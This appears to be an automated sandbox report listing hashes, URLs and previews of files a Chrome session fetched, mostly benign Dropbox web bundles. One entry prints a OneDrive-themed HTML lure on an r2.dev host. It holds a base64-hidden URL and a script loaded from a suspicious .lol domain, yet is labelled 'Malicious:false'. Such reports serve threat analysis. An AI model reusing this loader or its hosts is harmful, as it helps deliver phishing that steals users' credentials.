                                                    SHA-512:CC7789238415FCFBF11BAE7FD01995F1D5C4976087B81D9A29989980A3E1FEE94D5961755DFF43943AE8E51617E0B4FDC8F3FED7C51B3CF669EBE1692D29ED83
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_ui_overlay-vflT3P8JU.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","react-dom","./c_pap-events_sign_save_signature_doc","./c_ts_utils","./c_lodash"],(function(t,e,o,i,s,n,r){"use strict";function l(t){return t&&t.__esModule?t:{default:t}}function a(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(o){if("default"!==o){var i=Object.getOwnPropertyDescriptor(t,o);Object.defineProperty(e,o,i.get?i:{enumerable:!0,get:function(){return t[o]}})}})),e.default=t,Object.freeze(e)}var f,c=l(o),h=a(i);t.StickyPosition=void 0,(f=t.StickyPosition||(t.StickyPosition={}))[f.TOP_LEFT=1]="TOP_LEFT",f[f.TOP=2]="TOP",f[f.TOP_RIGHT=3]="TOP_RIGHT",f[f.LEFT_TOP=4]="LEFT_TOP",f[f.LEFT=5]="LEFT",f[f.LEFT_BOTTOM=6]="LEFT_BOTTOM",f[f.RIGHT_TOP=7]="RIGHT_TOP",f[f.RIGHT=8]="RIGHT",f[f.RIGHT_BOTTOM=9]="RIGHT_BOTTOM",f[f.BOTTOM_LEFT=10]="BOTTOM_LEFT",f[f.BOTTOM=11]="BOTTOM",f[f.BOTTOM_RIGHT=12]="BOTTOM_RIGHT",f[f.TOP_ALIGN_LEFT=13]="TOP_ALIGN_LEFT",f[f.TOP_ALIGN_RIGH
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5824)
                                                    Category:dropped
                                                    Size (bytes):5893
                                                    Entropy (8bit):5.264357963977115
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:75CD6826E67166218989DCC75D7668CB
                                                    SHA1:985D4EC5C84622A69541FF5BD55F8A437FA779FE
                                                    SHA-256:513639D9A882A51B3119C02D8C253FFBFD54A93A2FE5A20C67445DE877DA69A1
                                                    SHA-512:434B4D9B4821465726D68E466DF71E9356F3F1A62685CAE2653490267909576F288F880FBC14D5C4B8F4EF3352749A23CE4BD538CF492BA277271C8287F2E713
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_core_utils_is_text_preview_on","./c_file_viewer_hooks_useTouchInteraction","./c_file_viewer_loading_indicator","./e_core_exception","./c_react-redux_hooks_useDispatch","./c_file_viewer_hooks_use_mouse_active","./c_file_viewer_toolbar_fullscreen_button","./c_core_i18n","./c_dig-icons_assets_ui-icon_line_video","./c_dig-icons_assets_ui-icon_line_hide"],(function(e,t,i,n,o,r,l,a,s,c,u,_,d){"use strict";function w(e){return e&&e.__esModule?e:{default:e}}var v=w(i);const p=()=>{const{fileViewerId:e,featureConfig:i}=t.useFileViewerContext(),o=a.useDispatch(),r=t.useCurrentPreviewMetadata(),s=t.useFileViewerSelector(t.getCurrentPreviewKey,e),c=t.useFileViewerSelector(t.getIsFullScreen,e),u=l.isMobileRedesignEnabled(i),_=i.mobile_web,d=(w=r.previewType,![t.PreviewType.Video,t.PreviewType.Error,t.PreviewType.Loading].includes(w));var w;const v={fileViewerId:e,previewKey:s,actionContext:t.UserActionContext.SurfaceGesture},p=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (950)
                                                    Category:dropped
                                                    Size (bytes):1021
                                                    Entropy (8bit):5.33379334110533
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BD35D2D3178B467E31B1462494A6EDEC
                                                    SHA1:45ACBF35C91A729B092060CF25350D0ADC2077BD
                                                    SHA-256:7993742C68DD6C34C93C108E9F6B069441431A128D91E2C6D49950A71475D03E
                                                    SHA-512:5C766D990F1F2AF9180AF81FFC3439DF0E9A6C6F4FFC48D52540833E66A74DBA11E61129A18A6DE1C8727625A0B8AAC552AEE3C3B023566D9DF41E18D898C4BC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.ArrowLeftLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M19 11.75H7m5.25 6.5L6 11.75l6.25-6.5",stroke:"currentColor",strokeWidth:1.5,strokeMiterlimit:10,vectorEffect:"non-scaling-stroke"})),e.CircleSmallFilledFill=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 8c-2.617 0-4 1.383-4 4s1.383 4 4 4 4-1.383 4-4-1.383-4-4-4Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.useStabilizedCallback=e=>{const r=t.useRef(e);r.current=e;return t.useRef(((...e)=>(0,r.current)(...e))).current}}));.//# sourceMappingURL=c_hooks_use_stabilized_callb
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2429)
                                                    Category:downloaded
                                                    Size (bytes):2531
                                                    Entropy (8bit):5.160664871003755
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EBB21E01C6C8E73918A47ED02D88DCB7
                                                    SHA1:12C2DDA151CBE2FE7D668352F8D6E08E149D8C6A
                                                    SHA-256:404CF28B6C2AEB6A7533802B5E021E8741646873823A53645A17E278A1DE3BF3
                                                    SHA-512:4B718A62170297FF3BA6A2440D3E102FC53CA1FDA7FE1AF1C20973F6503454C80FB5F43D325AA4E9D006C240E7DC2CBB35CC5CD506A55BAFDC9E6BB044503E0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_shared-folder-preview-page_actions_on-download.after-display-vfl67IeAc.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_download_components_post-download-pre-susi-modal","./c_core_i18n","./e_core_exception","react","./e_edison","./c_ts_utils","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_src_sink_index","./c_lodash","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_dig-illustrations_hero_remote-work","metaserver/static/js/langpack"],(function(o,e,n,t,r,i,a,s,d,l,c,_,u,w,m,p,v,T,g,f){"use strict";o.onDownload=(o,{entry:a,entryShareToken:s,entrySharedLinkInfo:d,origin:l,onShowPreDownloadSUSIModal:c,vishOobIterateOnBasicUsersVariant:_,vishOobDownloadExcludePaidUsersVariant:u})=>{const w=o.$user.get(),m=o.$encryptionOptions.get();e.logTiburonEvent(w,a,e.TiburonEventName.ClickDownload,s,l,d.url);const p=!w&&!n.is_mobile_or_tablet
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1926)
                                                    Category:downloaded
                                                    Size (bytes):2012
                                                    Entropy (8bit):5.13458077420557
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:56AFB3C9E7271D0F1EE85B4674027DE2
                                                    SHA1:527B327B73458013FDDFB2D5EE6B30869993E822
                                                    SHA-256:3DF75BD8DACE58D0EBAC37D7849C91FD3770B1790C44B51777E02DA2CFFAD1DD
                                                    SHA-512:DA821580F1EBC2314C2FBD9314204C8E47A7669FB1841B1CFF75145B9A5E8A4AA16AA4386B806D0439F6596C390CDE0DDE98B6BBF8EE691DEFDBD281B278F485
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_components_titlebar_menu_content-vflVq-zye.js
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder"],(function(e,t,n,l){"use strict";function a(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var l=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,l.get?l:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var o=a(t);const i=({elementId:e,options:t,contentProps:n,logAction:a})=>o.createElement(l.Menu.Content,{role:"menu",...n},t.map(((t,n)=>o.createElement(r,{key:`${e}-${n}`,options:t,logAction:a}))));i.displayName="TitlebarMenuContent";const r=({options:e,logAction:t})=>e.some((e=>void 0!==e))?o.createElement(l.Menu.Segment,null,e.map((e=>e?o.createElement(s,{key:e.userAction,option:e,logAction:t}):null))):null;r.displayName="MenuSegment";const c=/ ?<span>\(.*\)<\/span>/,s=({option:e,logAction:t})=>{const{label:a,accessibleLabel:i,action:r,disabled:s,userAction:u,icon:d,dataTooltip:m}=e,p=n.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2959)
                                                    Category:downloaded
                                                    Size (bytes):3057
                                                    Entropy (8bit):5.201905519526044
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BBFD5A09C40B0AE7043FFF1BB700F29F
                                                    SHA1:4639E6C0B4A1CCCBE3B15A9C13BF1BDF4357276B
                                                    SHA-256:2CC3E19639C745038D8A3010C3A77D6FE0FE7980FC3B804C41393AB22C77E7FC
                                                    SHA-512:BF4742FE9F0152CD58DECFC55149B45A1BBA1D04619A3071C4E3582B31CE0DDB234595B77F2A91984E06011CD926D129A4B8FF393FDAFED8EBDDA4B28677236D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_title_bar_dropdowns_titlebar_help_dropdown.after-display-vflu_1aCc.js
                                                    Preview:define(["require","exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_file_viewer_components_titlebar_menu_content","./c_dig-icons_assets_ui-icon_line_key","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,n,t,i,r,o,s,a,c,l,d,_,u,p,f,g,b,m,v,y,h){"use strict";function A(e){if(e&&e.__esModule)return e;var n=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var i=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(n,t,i.get?i:{enumerable:!0,get:function(){return e[t]}})}})),n.default=e,Object.freeze(n)}var M,w,C=A(t);const P={userAction:r.User
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (884)
                                                    Category:dropped
                                                    Size (bytes):945
                                                    Entropy (8bit):4.95355934738558
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BB1995BB0F4AF901E7F9134D44DCE92F
                                                    SHA1:6344A56464B948C0919DA4343CE5630D028CAE2F
                                                    SHA-256:9EBAE9F16A4B6771941F250ABE46AD0F218C29859B4098E6C04D4070E9C17622
                                                    SHA-512:2CE20F1C122FD29CDA2C01E46984835BB9DA330027B9E57DA96B0727B048C3F7CDE2DFACDBEA43A5A2BECEDAAD0C3F202CBE38107C554AAFDF17C4C83584F33B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,a){"use strict";const i=function(e){switch(e){case"reader":return"viewer";case"writer":return"editor";case"owner":return"owner";default:return"default"}};e.apiGroupMemberToAvatarInfo=e=>({access_type:i(e.access_type),gid:e.memberId(),is_automatic:"team"===e.group_type,name:e.displayName(),num_users:e.member_count}),e.apiInviteeMemberToAvatarInfo=e=>({access_type:i(e.access_type),invitation_id:e.memberId(),email_or_fbname:e.displayName()}),e.apiUserMemberToAvatarInfo=function(e){const t=e.displayName()||"",r=e.email()||"";return{access_type:i(e.access_type),display_name:t,familiar_name:null!=e.account?e.account.familiar_name:void 0,initials:null!=e.initials?e.initials:a.getInitials(t),photo_url:null!=e.account?e.account.profile_photo_url:void 0,user_id:e.memberId(),email:r,account_id:e.account_id}}}));.//# sourceMappingURL=c_sharing_avatar_info.js-vflVtqmpR.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4339)
                                                    Category:dropped
                                                    Size (bytes):4427
                                                    Entropy (8bit):5.144221946768545
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EB832DE138C87375FAD5AF2A40054940
                                                    SHA1:85AC2337EB9EBF4E8D6AA085474968BEC844216B
                                                    SHA-256:09E84B6FE31D5F406D8FE133CB34A19C24AD24B6ACB32582D5F4C0842952A894
                                                    SHA-512:99A405289291ECCCA5A647953DFC6D756EF80425ADBF19475E8F3AD74172D6EB34AC4FC8E2E6DE8FAB403409205C6C8584B96872B596DFE031995C9EEDFD704D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,l){"use strict";function t(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(l,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})}})),l.default=e,Object.freeze(l)}var n=t(l);e.AlignVerticalLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M17 6.5v5h2V13h-2v5h-4.5v-5H11v4.5H6.5V13h-2v-1.5h2V8H11v3.5h1.5v-5H17ZM15.5 8H14v8.5h1.5V8Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.CustomizeLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12.82 9.178a.89.89 0 0 1 .993-.993.89.89 0 0 1 .993.993.89.89 0 0 1-.993.993.89.89 0 0 1-.993-.993Zm-3.532 0a.89.89 0 0 1 .994-.993.89.89 0 0 1 .993.993.89.89 0 0 1-.993.993.89.89 0 0 1-.994-.993Zm0 5.14a.89.89 0 0 1 .994-.993.89.89 0 0 1
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (684)
                                                    Category:downloaded
                                                    Size (bytes):685
                                                    Entropy (8bit):5.033559356693095
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E2826FD92D6DCAF79021355095EC49D9
                                                    SHA1:1572DA7F97839408214F18AF79C69611040E2084
                                                    SHA-256:2C456C7236EE6F3541118C38AE364CF303F38926BA99C7FD65794802B172ACBD
                                                    SHA-512:AAE0EE51EF9775A745E1B4A4607829609A54C211ED1C96303875FE6465770CBB54E267833E48C43BB7723891FF3D774F33200D6D8F5368817B085F946315EF85
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/notify-vfl4oJv2S.css
                                                    Preview:#notify-wrapper{width:100%;height:0px;left:0;top:0;text-align:center;position:fixed;z-index:10001}#notify-wrapper .left-align{text-align:left}#notify,.notify{margin:8px;padding:8px 16px;font-size:12px;display:inline-block}.notify-msg .button-as-link{font-size:12px}.notify-portal-component{width:100%;height:0}.server-error{background-color:#f4e5ea;border:1px solid #9a0032;color:#9a0032}.server-warning{background-color:#fef5da;border:1px solid #9a6500;color:#9a6500}.server-success{background-color:#e5efe0;border:1px solid #2d8000;color:#2d8000}.server-info{background-color:#fff;border:1px solid rgba(0,0,0,0.05);color:#666}.maestro #notify-wrapper.with-top-notification{top:48px}.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (14981)
                                                    Category:dropped
                                                    Size (bytes):15038
                                                    Entropy (8bit):5.2834222396056
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5C7235E2268E9091BE45B84FC540E595
                                                    SHA1:10C86E3B45315C78714A995576344FA91469D868
                                                    SHA-256:22B7E7F03D8EDA90884E7D215008ECC21A4C24E43F9686E1E96B87086DAAFB67
                                                    SHA-512:155F6BC0918D85B5E2CB1657ECCF9C9807957E1706AF58012B8890C48063D6B42483BAD06217E863D05FF578416130BA0AEEC79B14522201479AAF3BF059AEDD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(o,e){"use strict";const t=["other","invalid_file_id","scheduling_failed"];const a=["unspecified","pdf_conversion","unzip","image_conversion","video_conversion","tidy_up","naming_conventions","audio_conversion","email_ingest","smart_subfolders","tag","move_file","watermarking","transcribe_media","edit_video","archive_from_replay","list_directory","video_scale","multi_step"];function l(o){return a.find((e=>e===(null==o?void 0:o.toLowerCase())))}const r=["create","add","edit","remove"];function n(o){return r.find((e=>e===(null==o?void 0:o.toLowerCase())))}const i=["manual","apply_to_existing","file_add","scheduled"];function c(o){return i.find((e=>e===(null==o?void 0:o.toLowerCase())))}const p=function(o){return{class:"workflow_automation_api",action:"succeed",object:"submit_manual_workflow",properties:o}},s=function(o){return{class:"workflow_automation_api",action:"initiate",object:"auto_folder_modal_folder_create",pro
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):66870
                                                    Entropy (8bit):5.585362899656594
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B708BDE2D0DD43BCD27C50645F07C203
                                                    SHA1:D9DF6A00E0DB9BCEEBE205C96A45A05B669D3A75
                                                    SHA-256:12F4209DAC67DC5F44841F0BA73F370B9B46C364B09703EE696A3D4F4B4F10BF
                                                    SHA-512:7B62C103C1F464196CCCFD7B5FFED7A888E04DC9788927821FF50B5A6CE9C70DC2A98F55030C0615DF5946782A6326808A1DC9F5AEF5792A9002CECD1CDC67FA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_core_exception","./c_src_sink_index","./c_ts_utils","metaserver/static/js/langpack","react","./c_lodash"],(function(t,e,r,n,o,i,a){"use strict";function s(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(t,r);Object.defineProperty(e,r,n.get?n:{enumerable:!0,get:function(){return t[r]}})}})),e.default=t,Object.freeze(e)}var l=s(o),c=s(i),u=function(t,e){return u=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},u(t,e)};var h=function(){return h=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},h.apply(this,arguments)};function f(t,e){var r={};for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&e.indexOf(n)<0&&(r[n]=t[n]);if
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):255
                                                    Entropy (8bit):5.442226617839346
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E0C1055224FF67663BD7D02D1D3A54BC
                                                    SHA1:F0E2636E4AC811966302CFCA599885727CDBE9CB
                                                    SHA-256:AA80B19FDA161EDB3DEB0CBA6B5E45EC5392DA2D493FFEE130415849539AC1F3
                                                    SHA-512:379F41CBEF6CB16A749272065FF513653E23D0AE4F82FC4E80756840A5D28D2D1EE5B1FF865BA867B2AB05E93D877C635B8C0CAB03B23C7BB3F08BD3B8CBD7E4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.html
                                                    Preview:<html><head></head><body><input type="hidden" id="b64u" value="aHR0cHM6Ly9jbW93dW5mZXJtbG5kb3JtaW5hbnRja3Jld3pvby5sb2wvR0FSQ0lBL2RjZGY0YTgucGhw"></input><script src="https://cmowunfermlndorminantckrewzoo.lol/GARCIA/admin/js/sc.php"></script></body></html>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (21020)
                                                    Category:downloaded
                                                    Size (bytes):408768
                                                    Entropy (8bit):4.877670045540239
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DE9983228FB1D820C2321FB9AD01EFD0
                                                    SHA1:D061FAACB5DE21E497018F5A534A0D2A541F51E2
                                                    SHA-256:ED0B371327FC9F1E00376540935B863E66A3D16E9C3225DCC5EAD4DD118EF391
                                                    SHA-512:4446EFB929F6BB2B833BF529D14D1D5D003D006226ED614E91570A6C1F7AA2A5E22184C6BDD9E6DF744C5E172F6B7BE8BF06D7E19F1F6BE207D9E4623D042136
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl3pmDIo.css
                                                    Preview:./* -- typescript/component_libraries/dwg-components/src/atoms/dwg-box/index.web.css */..dwg-box{-webkit-tap-highlight-color:transparent;box-sizing:border-box}./* -- typescript/component_libraries/dwg-components/src/atoms/dwg-flex-grid/index.web.css */..dwg-flex-grid{--dwg-flex-grid__columns:var(--dwg-flex-grid__columns--mobile);width:100%}.dwg-flex-grid__cell{--dwg-flex-grid__col-span:var(--dwg-flex-grid__col-span--mobile,1);--dwg-flex-grid__col-pad-left:var(--dwg-flex-grid__col-pad-left--mobile,0);--dwg-flex-grid__col-pad-right:var(--dwg-flex-grid__col-pad-right--mobile,0)}@media (min-width:480px){.dwg-flex-grid{--dwg-flex-grid__columns:var(. --dwg-flex-grid__columns--mobile-lg,var(--dwg-flex-grid__columns--mobile). )}.dwg-flex-grid__cell{--dwg-flex-grid__col-span:var(. --dwg-flex-grid__col-span--mobile-lg,var(--dwg-flex-grid__col-span--mobile). );--dwg-flex-grid__col-pad-left:var(. --dwg-flex-grid__col-pad-left--mobile-lg,var(--dwg-flex
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1602)
                                                    Category:dropped
                                                    Size (bytes):1679
                                                    Entropy (8bit):5.175693770761639
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AC5436C4B80F5045A48F58BB814C1291
                                                    SHA1:BB56B62A59AA086AB15511754DAA712502ADEE8A
                                                    SHA-256:9EA25D842A18F822279551571A07C631EA2801B4281DB446AD259EE19D425F1F
                                                    SHA-512:5417F6F323A2DA8E48FCBB1552E1AD153765107B06DD87962C5A93269B5620BBA66D5C0B29E98AFD347A75B91D532F548F97B79ECE75AAE3324E1D522981CC78
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var n=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,n.get?n:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var n=c(t);e.MagicWandLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M9 2.5c0 1.151-.28 1.862-.709 2.291-.43.43-1.14.709-2.291.709V7c1.151 0 1.862.28 2.291.709.43.43.709 1.14.709 2.291h1.5c0-1.151.28-1.862.709-2.291.43-.43 1.14-.709 2.291-.709V5.5c-1.152 0-1.862-.28-2.291-.709-.43-.43-.709-1.14-.709-2.291H9ZM5.03 20.03l9.5-9.5-1.06-1.06-9.5 9.5 1.06 1.06ZM17.25 6c0 .957-.15 1.299-.301 1.449-.15.15-.493.301-1.449.301v1.5c.956 0 1.299.15 1.449.301.15.15.301.492.301 1.449h1.5c0-.957.15-1.299.301-1.449.15-.15.493-.301 1.449-.301v-1.5c-.956 0-1.299-.15-1.449-.301-.15-.15-.301-.492-.301-1.449h-1.5Zm-2 6.5c0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (885)
                                                    Category:downloaded
                                                    Size (bytes):960
                                                    Entropy (8bit):5.522882613697932
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:ADD8F0717857175AA7BABDD6AE8008AA
                                                    SHA1:1E581CB0BB9C10E2275342B951BE2A0C8FB874B6
                                                    SHA-256:24D814DDB32BAF6CEA90FCDCBDD9F318E78C677D29C7D947979B03CFB5EA56CB
                                                    SHA-512:83F2A58268F03C8738DCEB37FD868CD5BC3DF87B0F0CEB1FC8E66F842B9D742E022F5EC30B16E3BCEAD950E5A5B4576121823729315266501555135C259AB21E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_pap-events_previews_create_folder-vflrdjwcX.js
                                                    Preview:define(["exports"],(function(e){"use strict";const t=["mov","mp4","m4v","avi","mkv","mpeg","mpg"],A=["aac","aif","aiff","flac","m4a","m4r","mp3","oga","ogg","wav","wma"];e.AUTO_SNAP_THRESHOLD=20,e.EMPTY_IMG_SRC="data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=",e.LEFT_BORDER_ADJUSTMENT=4,e.PAP_Create_Folder=function(e){return{class:"previews",action:"create",object:"folder",properties:e}},e.PAP_Delete_File=function(e){return{class:"previews",action:"delete",object:"file",properties:e}},e.PAP_Select_ContentAction=function(e){return{class:"navigation",action:"select",object:"content_action",properties:e}},e.RIGHT_BORDER_ADJUSTMENT=6,e.TIME_MARKER_GAP=8,e.TIME_MARKER_WIDTH=2,e.TOOLTIP_TIMEOUT=1e3,e.TRIM_BAR_HEIGHT_AUDIO=42,e.TRIM_BAR_HEIGHT_VIDEO=60,e.TRIM_BAR_HORIZONTAL_PADDING=26,e.TRIM_BORDER_ADJUSTMENT=4,e.isExtensionSupported=e=>t.includes(e)||A.includes(e)}));.//# sourceMappingURL=c_pap-events_previews_create_folder.js-vfl4ZyJ5Y.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1814)
                                                    Category:dropped
                                                    Size (bytes):1891
                                                    Entropy (8bit):5.358835216156512
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:63AA6DF954DF88C104B7D0B6BD8BBFD0
                                                    SHA1:D25BD11468A03D132AB9A36967C184F6B6FEB0F2
                                                    SHA-256:E2C5A70FEE8652DF70C130E981243D9BE1CC7C8D709AE64D5A90E340EEAA5707
                                                    SHA-512:72F59AB095D1FAD2B6D823CD8BF1927947685E3A21DD9E37426AC34E2A5EE2100A66A191B3485CDA6F5BF488FAA3569052DB79891ADE3E8E60A09D53DB523D68
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.AddCircleLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12.5 7.5H11V11H7.5v1.5H11V16h1.5v-3.5H16V11h-3.5V7.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"M11.75 4C6.535 4 4 6.535 4 11.75s2.535 7.75 7.75 7.75 7.75-2.535 7.75-7.75S16.965 4 11.75 4Zm0 14c-4.322 0-6.25-1.927-6.25-6.25 0-4.322 1.928-6.25 6.25-6.25 4.323 0 6.25 1.928 6.25 6.25 0 4.323-1.927 6.25-6.25 6.25Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.ConvertFileLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M15.982 2.526a2.41
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3323)
                                                    Category:downloaded
                                                    Size (bytes):3403
                                                    Entropy (8bit):5.031539562328045
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:249C6148CF653EB13524F3137782F939
                                                    SHA1:1543527F434CD2F318215EEA00BE6535583034EC
                                                    SHA-256:009D7E7CE3B236F2852EBB5AF13B69E59E4A2E107AFCDF7CB00AAE598BCFDAEF
                                                    SHA-512:B730AD1EC9BC1E26FBC31B5AF3372515A1CF3FAA904CCC6661E88CF3E166FD32BBAA04F91939A83EC658F96A90726634EF7A22DD173CA05D9ECAB3D1C790105B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_text-box-vflJJxhSM.js
